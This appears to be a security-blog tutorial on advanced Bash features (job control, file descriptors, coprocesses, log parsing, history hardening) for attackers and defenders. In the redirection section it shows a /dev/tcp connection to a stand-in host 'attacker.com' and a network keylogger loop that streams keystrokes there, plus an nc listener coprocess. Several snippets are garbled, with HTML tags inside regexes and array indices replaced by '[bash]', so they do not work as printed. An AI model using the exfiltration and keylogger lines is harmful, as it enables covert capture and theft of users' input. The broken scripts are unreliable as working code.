Listen to this Post
Introduction:
Bash (Bourne Again SHell) remains the backbone of Linux system administration, penetration testing, and security automation. With over 200 pages of deep technical reference, the official Bash manual (Version 5.1) unlocks advanced process handling, redirections, coprocesses, and programmable completion—essential skills for any cybersecurity professional aiming to write stealthy, efficient, and resilient scripts for defense or ethical hacking.
Learning Objectives:
- Master Bash process management, job control, and file descriptor redirections to build secure automation workflows.
- Utilize Bash’s extended regex, arrays, and coprocess features for log analysis, intrusion detection scripts, and reverse shell handling.
- Implement POSIX-compliant portability techniques to ensure your security tools run across Linux, macOS, and WSL environments.
You Should Know:
- Process Management and Job Control for Ethical Hacking
Bash gives you granular control over synchronous and asynchronous command execution. In security work, this allows you to run network scans in the background while analyzing logs in real time.
Step‑by‑step guide:
- Run a background job: `nmap -sV 192.168.1.0/24 &` (the `&` puts it in background).
- List background jobs: `jobs -l` shows PID and state.
- Bring a job to foreground: `fg %1` resumes job number 1.
- Suspend a running command: Press `Ctrl+Z` then send to background with
bg. - Disown a process to keep it alive after logout: `disown %1` or use `nohup` prefix.
Linux command to monitor process tree (useful for detecting hidden malware):
`pstree -p | grep -B 5 -A 5 “suspicious_name”`
Windows equivalent (PowerShell) for background jobs:
`Start-Job -ScriptBlock { nmap 192.168.1.0/24 }`
`Get-Job`
`Receive-Job -Id 1`
2. Advanced I/O Redirection and File Descriptors
Manipulating input/output descriptors is critical for data exfiltration, log manipulation, or creating stealthy backdoors. Bash allows you to duplicate, move, and close descriptors.
Step‑by‑step guide:
- Redirect stdout and stderr to separate files:
`ls /fake /etc > stdout.txt 2> stderr.txt`
- Merge stderr into stdout: `command 2>&1` (used often in cron jobs for cleaner logging).
- Use a custom file descriptor (FD 3) to read/write:
`exec 3<> secret.txt` then `echo “malicious payload” >&3`
- Close FD 3: `exec 3>&-`
– Create a persistence trick: `exec 5<> /dev/tcp/attacker.com/4444; echo “HELLO” >&5` – this opens a raw TCP socket from Bash (dangerous, but educational for defense).
Code snippet for a basic keylogger over network (pure Bash, educational):
while read -s -n1 key; do echo "$(date) - $key" >&5 done
Mitigation: Monitor for unexpected open file descriptors with `lsof -p $$` inside scripts.
- Using Arrays and Extended Regex for Log Parsing
Bash arrays and `=~` operator turn the shell into a lightweight data‑analysis tool ideal for parsing auth logs, firewall logs, or web server access logs.
Step‑by‑step guide:
- Declare associative array for counting attack sources:
`declare -A ip_hits`
- Read a log line and extract IP using regex:
`if [[ “$line” =~ ([0-9]{1,3}\.){3}[0-9]{1,3} ]]; then ip=${BASH_REMATCH}; fi` - Increment counter: `((ip_hits[$ip]++))` - Output top 10 attackers: `for ip in "${!ip_hits[@]}"; do echo "$ip ${ip_hits[$ip]}"; done | sort -rnk2 | head` Full script to detect failed SSH attempts from /var/log/auth.log: [bash] !/bin/bash declare -A fails while IFS= read -r line; do if [[ "$line" =~ Failed[[:space:]]password[[:space:]]for<a href="[^[:space:]]+">[:space:]</a>[[:space:]]from<a href="[0-9.]+">[:space:]</a> ]]; then user="${BASH_REMATCH[bash]}" ip="${BASH_REMATCH[bash]}" fails["$ip|$user"]=$((fails["$ip|$user"]+1)) fi done < /var/log/auth.log for key in "${!fails[@]}"; do echo "$key : ${fails[$key]}" done | sort -t: -rnk2
4. Coprocesses for Bidirectional Communication
Coprocesses let a Bash script spawn a sub‑process and maintain two‑way communication – invaluable for interacting with openssl, nc, or custom exploit payloads.
Step‑by‑step guide:
- Start a coprocess: `coproc nc -lvnp 4444` (listener in background).
- Send data to it: `echo “GET / HTTP/1.1” >&${COPROC
}` - Read response: `read -u ${COPROC[bash]} line` - Close cleanly: `exec {COPROC[bash]}<&- {COPROC[bash]}>&-` - Use case – automating a TOTP extraction: [bash] coproc oathtool --totp -b $SECRET_KEY read -u ${COPROC[bash]} token echo "Current OTP: $token"
Security note: Coprocesses can be hijacked if file descriptors are leaked – always unset `COPROC` variables after use.
5. Programmable Completion and Bash History Hardening
Attackers often tamper with bash history to hide commands. Defenders can harden history behavior and even create custom completions for security tools.
Step‑by‑step hardening:
- Prevent history spoofing: add to `~/.bashrc`
`export HISTTIMEFORMAT=”%F %T “` (timestamp every command)
`export HISTSIZE=-1` (unlimited history)
`export HISTFILE=~/.bash_history_protected`
`chattr +a ~/.bash_history_protected` (append‑only attribute, root only)
- Immediate logging of commands:
`shopt -s histappend`
`PROMPT_COMMAND=’history -a’`
- Create a custom completion for `nmap` flags:
`complete -W “-sS -sT -sU -p- -A -T4” nmap`
Windows command to audit PowerShell history (similar):
`Get-Content (Get-PSReadlineOption).HistorySavePath`
6. Writing POSIX‑Compliant Security Scripts for Cross‑Platform Use
Portability ensures your incident response or recon script runs on any Unix‑like system (including macOS and WSL). Avoid Bashisms like `[[ ]]` or arrays if compliance is required.
Step‑by‑step guide:
- Use `[ ]` instead of
[[ ]]: `if [ “$var” = “value” ]; then`
– Avoid `&>` redirection – use> file 2>&1. - No `source` command – use `. script.sh` instead.
- Example portable script to check open ports using only POSIX features:
!/bin/sh for port in 22 80 443 3389; do timeout 2 nc -z 127.0.0.1 $port && echo "Port $port open" done
- Test with `dash` (Debian Almquist shell) or `posh` on Windows.
Linux command to detect non‑POSIX Bashisms in a script:
`checkbashisms script.sh` (install `devscripts` package).
What Undercode Say:
- Key Takeaway 1: Bash is not just a shell – it’s a complete, stealthy programming environment. Mastering descriptors, coprocesses, and job control gives defenders and red‑teamers an edge without installing additional tools.
- Key Takeaway 2: Security professionals often overlook bash history hardening and portability. A single misconfigured `.bashrc` or a Bash‑specific script can break incident response on an Alpine container or a FreeBSD jump box.
Analysis: The 214‑page Bash reference manual is a goldmine for cyber defense – from crafting immutable history logs to building real‑time log analyzers with associative arrays. However, many scan the manual only for basic looping. The real power lies in low‑level I/O and process manipulation, which directly translate to persistence techniques, data exfiltration channels, and quick win detection scripts. Undercode recommends every SOC analyst build a “bash‑only” toolkit – no Python dependency, pure shell – to ensure rapid triage on compromised systems where high‑level interpreters may be disabled or monitored.
Prediction:
As containers and serverless environments grow, Bash will remain the lowest common denominator for automation. However, we predict an increase in “shell‑aware” intrusion detection systems that monitor for abnormal descriptor usage (e.g., raw TCP from a script) and unexpected coprocess spawns. The Bash manual’s advanced features will become both a favored attack vector for fileless malware and a defensive standard for lightweight eBPF‑like monitoring. Expect future CIS benchmarks to include specific checks for `exec` redirections and history file append‑only settings.
▶️ Related Video (78% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: H%C3%A9ctor Joaqu%C3%ADn – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
